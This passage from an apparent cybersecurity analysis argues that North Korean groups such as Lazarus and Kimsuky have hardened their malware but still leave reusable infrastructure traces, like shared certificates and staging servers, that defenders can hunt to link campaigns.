And that’s why it’s so important to look deeper. Once the pivot moves from payloads to infrastructure, the separation between DPRK subgroups becomes less distinct and shared operational habits start to surface. Campaigns that appear unrelated at the malware level begin to reveal common certificates, showing how activity often treated as separate is in fact closely linked.

Operational security among DPRK cyber operators has evolved unevenly over the past decade, revealing a trade-off between stealth and operational efficiency. Early Lazarus campaigns in the mid-2010s were marked by comparatively noisy infrastructure and bespoke malware, making attribution possible but often slow and reliant on payload analysis and victim-side forensics.

As global scrutiny increased following high-profile incidents, DPRK actors adapted by hardening malware, adopting layered obfuscation and increasingly abusing legitimate platforms and open source tooling to blend into normal traffic. At the same time, repeated investigations point to a persistent weakness in infrastructure OPSEC: long-lived staging servers, reused certificates, identical Fast Reverse Proxy tunnelling nodes and exposed directories that reappear across campaigns and even across subgroups such as Lazarus and Kimsuky.

Incidents like the Kimsuky “Kim” leak highlight this imbalance, where sophisticated social engineering and credential theft operations were undermined by recoverable operator artefacts and poorly compartmentalized infrastructure.

Taken together, the record of the past decade suggests DPRK actors have become more disciplined at the payload and intrusion layer, but remain consistently exposed at the infrastructure layer, giving defenders a durable, campaign-spanning advantage.

Malware will continue to evolve. Lures will change. Domains will rotate. Infrastructure, however, leaves consistent patterns. In the case of Lazarus and Kimsuky, and beyond, these patterns make it possible to connect activity, surface related clusters and identify supporting infrastructure before it is fully weaponized.

That is why infrastructure hunting is no longer a supporting discipline. It is the vantage point that allows defenders to see how operations are built, sustained and scaled.

We reviewed and rated the best Antivirus Software.